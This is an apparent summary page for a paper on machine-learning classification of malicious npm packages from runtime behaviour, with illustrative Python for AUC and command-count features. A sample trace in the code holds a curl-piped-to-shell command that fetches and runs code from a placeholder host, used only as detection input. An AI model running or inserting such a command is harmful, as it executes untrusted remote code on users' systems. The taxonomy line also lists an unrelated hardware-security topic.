Towards Classifying Benign And Malicious Packages Using Machine Learning

Thanh-Cong Nguyen; Ngoc-Thanh Nguyen; Van-Giau Ung; Duc-Ly Vu

arXiv:2511.15033·cs.CR·November 20, 2025

TL;DR

This paper presents a machine-learning method that classifies open-source packages as benign or malicious from their runtime behavior, reporting an AUC of 0.91 on npm packages.

Contribution

The paper extracts features from dynamic analysis (e.g., executed commands) and feeds them to machine learning models, so that packages are classified as benign or malicious automatically.

Findings

01 The classifier reaches an AUC of 0.91.

02 The false positive rate is nearly 0%.

03 The approach differentiates effectively between benign and malicious packages.
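To make the two reported metrics concrete, here is a minimal sketch of how AUC and false positive rate can be computed from classifier scores. The labels, scores, and the 0.5 threshold are made-up toy values rather than data from the paper, and the function names are hypothetical.

```python
def roc_auc(labels, scores):
    """AUC as the probability that a randomly chosen malicious package (label 1)
    receives a higher score than a randomly chosen benign one (label 0).
    Ties count as half a win."""
    pos = [s for y, s in zip(labels, scores) if y == 1]
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not pos or not neg:
        raise ValueError("need at least one example of each class")
    wins = 0.0
    for p in pos:
        for n in neg:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5
    return wins / (len(pos) * len(neg))


def false_positive_rate(labels, scores, threshold):
    """Fraction of benign packages whose score reaches the decision threshold."""
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not neg:
        raise ValueError("need at least one benign example")
    return sum(1 for s in neg if s >= threshold) / len(neg)


# Toy data (assumption): 1 = malicious, 0 = benign.
labels = [1, 1, 0, 0, 0]
scores = [0.9, 0.3, 0.4, 0.2, 0.1]

auc = roc_auc(labels, scores)
fpr = false_positive_rate(labels, scores, threshold=0.5)
```

AUC is independent of any threshold, whereas the false positive rate depends on the threshold chosen, so the two findings describe different aspects of the classifier.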

Abstract

Recently, the number of malicious open-source packages in package repositories has been increasing dramatically. While major security scanners focus on identifying known Common Vulnerabilities and Exposures (CVEs) in open-source packages, there are very few studies on detecting malicious packages. Malicious open-source package detection typically requires static analysis, dynamic analysis, or both. Dynamic analysis is more effective as it can expose a package's behaviors at runtime. However, current dynamic analysis tools (e.g., ossf's package-analysis) lack an automatic method to differentiate malicious packages from benign packages. In this paper, we propose an approach to extract features from dynamic analysis (e.g., executed commands) and leverage machine learning techniques to automatically classify packages as benign or malicious. Our evaluation of nearly 2,000 packages on npm shows…
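As an illustration of the feature-extraction idea in the abstract, the sketch below turns a list of executed commands into a fixed-length count vector that a classifier could consume. It is not the authors' feature set: the trace, the vocabulary, and the function names are assumptions made for this example only.

```python
import posixpath
import shlex
from collections import Counter


def command_features(commands):
    """Count how often each executable name appears among the executed commands."""
    counts = Counter()
    for cmd in commands:
        try:
            tokens = shlex.split(cmd)
        except ValueError:
            # Unbalanced quotes: fall back to whitespace splitting.
            tokens = cmd.split()
        if tokens:
            # Keep only the program name, e.g. "/usr/bin/curl" -> "curl".
            counts[posixpath.basename(tokens[0])] += 1
    return counts


def to_vector(counts, vocabulary):
    """Project the counts onto a fixed vocabulary so every package yields the same length."""
    return [counts.get(name, 0) for name in vocabulary]


# Hypothetical trace for one package (not taken from the paper).
trace = [
    "/bin/sh -c 'curl http://example.invalid/x | sh'",
    "node index.js",
    "/usr/bin/curl -s http://example.invalid/y",
]
vocab = ["curl", "node", "sh", "wget"]  # assumed vocabulary

feats = command_features(trace)
vec = to_vector(feats, vocab)
```

Counting only the top-level executable is a deliberate simplification: the `curl` inside the quoted `sh -c` string is not counted, so a fuller pipeline would likely also inspect arguments or rely on the other signals that the dynamic analysis tool records.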

Taxonomy

Topics: Physical Unclonable Functions (PUFs) and Hardware Security · Advanced Malware Detection Techniques · Security and Verification in Computing